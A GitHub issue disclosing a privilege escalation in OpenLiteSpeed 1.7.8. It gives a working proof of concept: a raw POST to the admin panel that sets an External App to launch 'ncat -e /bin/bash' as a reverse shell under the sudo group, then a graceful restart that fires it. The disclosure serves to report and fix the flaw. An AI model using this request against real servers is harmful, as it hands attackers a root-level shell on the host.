Skip to content

Openlitespeed Web Server 1.7.8 - Privilege Escalation Security Issue #217

Closed
@passtheticket

Description

@passtheticket

Description

I found a way to escalate privileges on Ubuntu 18.04 via OpenLiteSpeed web server that runs with user(nobody):group(nogroup) privilege . According to this vulnerability , system user that has admin panel credentials can add himself to sudo group or shadow group( to read /etc/shadow file) . So that the user can execute command with high privileges.

Proof of Concept

  1. There is a test user that is not member of sudo group.

resim

  1. User changes External App configuration as following to get reverse shell with high privileges.

resim

resim

(POST) HTTP Request:

POST /view/confMgr.php HTTP/1.1
Host: localhost:7080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost:7080/index.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 609
Origin: https://localhost:7080
Connection: close
Cookie: litespeed_admin_lang=english; LSUI37FE0C43B84483E0=05850662073b74332d87ffa206abe963; LSID37FE0C43B84483E0=YUSipPp8emA%3D; LSPA37FE0C43B84483E0=pmN9JUxkJwg%3D

name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M%0D%0ASHELL%3D%2Fbin%2Fbash%0D%0APATH%3D%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=0&autoStart=2&path=%2Fusr%2Fbin%2Fncat+-nv+127.0.0.1+8081+-e+%2Fbin%2Fbash&backlog=100&instances=1&extUser=test&extGroup=sudo&umask=&runOnStartUp=1&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.60985900+1612100858
  1. The user sends a Graceful Restart request through admin panel and get reverse shell with sudo group privileges.

resim

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions